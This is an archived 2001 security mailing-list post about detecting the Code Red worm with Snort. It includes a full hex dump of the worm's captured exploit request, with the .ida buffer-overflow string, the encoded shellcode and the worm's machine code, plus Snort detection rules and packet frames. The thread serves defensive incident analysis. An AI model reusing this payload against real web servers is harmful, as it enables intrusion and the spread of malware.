Security Incidents mailing list archives
Re: .ida Intrusion Attempt
From: Dr SuSE <drsuse () drsuse org>
Date: Thu, 19 Jul 2001 17:24:36 GMT
I'm running 1.8p1 and the .ida rule picked up all visits from the code red worm which we started seeing this afternoon without issue. Below is the complete packet if your interested. length = 1460 000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E ?NNNNNNNNNNNNNNN 020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0f0 : 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 N%u9090%u6858%uc 100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F ype: text/xml.HO 1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A ST:www.worm.com. 1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E Accept: */*.Con 1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 tent-length: 356 1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53 9 ....U........S 1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC VW.............. 1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A ......p......... 200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64 .....h.........d 210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9 ......G.d.=..... 220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF o.....`......... 230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4 ......h......... 240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A .....X......w... 250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B ....p........... 260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF .X...........X.. 270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58 ...X......xu...X 280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66 .........X...3.f 290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58 ..=MZ..........X 2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B ....Q<..X...3.f. 2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95 ....PE....y..... 2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01 X....B<..X....T. 2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54 x..X.....T.....T 2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE ....H...X.....L. 2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85 ....L....:KERN.. 300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33 3.....L....x.EL3 310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34 2.. .....X.....4 320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03 .....T.....X.... 330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00 B ..L.....H..... 340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48 ......H........H 350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE .....L........L. 360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48 ....T.....H...;H 370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B .........L...... 380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00 .X....<.GetP.... 390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF ....L.......X... 3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95 .|..rocA........ 3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF H.....H.....X... 3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89 ..T....H$3.f.... 3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85 .L.....T....Q... 3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95 L....L....L..... 3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF L.....L.....L... 400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE ..L.....X.....T. 410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85 ...H......L..... 420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF L.....X.....p... 430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE ................ 440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF ...G.d.......p.. 450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01 ..u..8.....L.... 460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D .......L........ 470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F L.....h......... 480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA .......h........ 490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF .u!..h........P. 4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE .....;..CKCK..4. 4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34 ...*....h...Q..4 4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43 ...R..p...;..CKC 4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F K..L............ 4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B ..h........h.... 4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95 .h........t..... 500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF h........h....S. 510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF ....h........h.. 520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF ..M.........l... 530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF ..L............. 540 : 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF h.E............. 550 : 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D [SS.......cx...M 560 : 08 8B 51 10 89 95 50 FE FF FF 83 BD 50 FE FF FF ..Q...P.....P... 570 : 00 75 26 8B F4 6A 00 8D 85 4C FE FF FF 50 8B 8D .u&..j...L...P.. 580 : 68 FE FF FF 51 8B 55 08 8B 42 08 50 FF 95 6C FE h...Q.U..B.P..l. 590 : FF FF 3B F4 90 43 4B 43 4B 83 BD 50 FE FF FF 64 ..;..CKCK..P...d 5a0 : 7D 5C 8B 8D 50 FE FF FF 83 C1 01 89 8D 50 FE FF }\..P........P.. 5b0 : FF 8B 95 50 ...P
That's a rule ordering issue, I'm pretty sure we fixed that one in 1.8-RELEASE... -Marty Joe Smith wrote:Hey all, Just got this .ida attack on my sensors. This is cute, how it splits the GET from the default.ida? query. Please note that while snort did detect it, it wasn't detected by the .ida rule. Instead, it detected it as a whisker splice attack. alert TCP $EXTERNAL any -> $INTERNAL 80 (msg: "IDS415/web-misc_http-whisker-splicing-attack-tab"; dsize: <5; flags: A+; content: "|09|"; classtype: suspicious; reference: arachnids,415;) alert TCP $EXTERNAL any -> $INTERNAL 80 (msg: "IDS552/web-iis_IIS ISAPI Overflow ida"; dsize: >239; flags: A+; uricontent: ".ida?"; classtype: system-or-info-attempt; reference: arachnids,552;) I'm guessing that once snort found a match with whisker, it stopped looking for other matches. I've included the relavent frames for your review. 63.241.137.194-attacker my.poor.website HTTP GET Frame 4 (60 on wire, 60 captured) Ethernet II Internet Protocol Transmission Control Protocol, Src Port: 21500 (21500), Dst Port: 80 (80), Seq: 3988343872, Ack: 2181442487 Hypertext Transfer Protocol 0 00d0 b790 dd6f 0002 1724 4800 0800 4500 .....o...$H...E. 10 002c 105a 4000 7206 9c64 3ff1 89c2 3f59 .,.Z@.r..d?...?Y 20 5301 53fc 0050 edb9 4c40 8206 2bb7 5018 S.S..P..L@..+.P. 30 40b0 3ba1 0000 4745 5420 0000 @.;...GET .. 63.241.137.194-attacker my.poor.website HTTP Continuation Frame 5 (1434 on wire, 100 captured) Ethernet II Internet Protocol Transmission Control Protocol, Src Port: 21500 (21500), Dst Port: 80 (80), Seq: 3988343876, Ack: 2181442487 Hypertext Transfer Protocol 0 00d0 b790 dd6f 0002 1724 4800 0800 4500 .....o...$H...E. 10 058c 105b 4000 7206 9703 3ff1 89c2 3f59 ...[@.r...?...?Y 20 5301 53fc 0050 edb9 4c44 8206 2bb7 5018 S.S..P..LD..+.P. 30 40b0 0109 0000 2f64 6566 6175 6c74 2e69 @...../default.i 40 6461 3f4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e da?NNNNNNNNNNNNN 50 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN 60 4e4e 4e4e NNNN __________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail http://personal.mail.yahoo.com/-- Martin Roesch roesch () sourcefire com http://www.sourcefire.com - http://www.snort.org
Score my PGP key @ http://www.drsuse.org/pks --------------------------------------------- Microsoft ist nicht installiert. http://www.drsuse.org/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- RE: .ida Intrusion Attempt Keith.Morgan (Jul 19)
- <Possible follow-ups>
- RE: .ida Intrusion Attempt Tulchinskiy, Sasha (Jul 19)
- Re: .ida Intrusion Attempt Sebastian Ip (Jul 19)
- Re: .ida Intrusion Attempt Kheos ml (Jul 19)
- Re: .ida Intrusion Attempt Sebastian Ip (Jul 19)
- RE: .ida Intrusion Attempt Yom, Francis (Jul 19)
- Re: .ida Intrusion Attempt Dr SuSE (Jul 19)
- Re: .ida Intrusion Attempt bugtraq (Jul 19)
- RE: .ida Intrusion Attempt Colby Rice (Jul 19)
- RE: .ida Intrusion Attempt Tim Winders (Jul 19)
- .ida Intrusion Attempt Joe Smith (Jul 19)
- Re: .ida Intrusion Attempt Martin Roesch (Jul 19)
- Re: .ida Intrusion Attempt Joe Smith (Jul 19)
- Re: .ida Intrusion Attempt Martin Roesch (Jul 19)
- RE: .ida Intrusion Attempt Ulrich Keil (Jul 19)
- Re: .ida Intrusion Attempt Russell Fulton (Jul 19)
- Re: .ida Intrusion Attempt Stuart Staniford (Jul 19)
- Re: .ida Intrusion Attempt E. Larry Lidz (Jul 20)
- Re: .ida Intrusion Attempt Stuart Staniford (Jul 19)
(Thread continues...)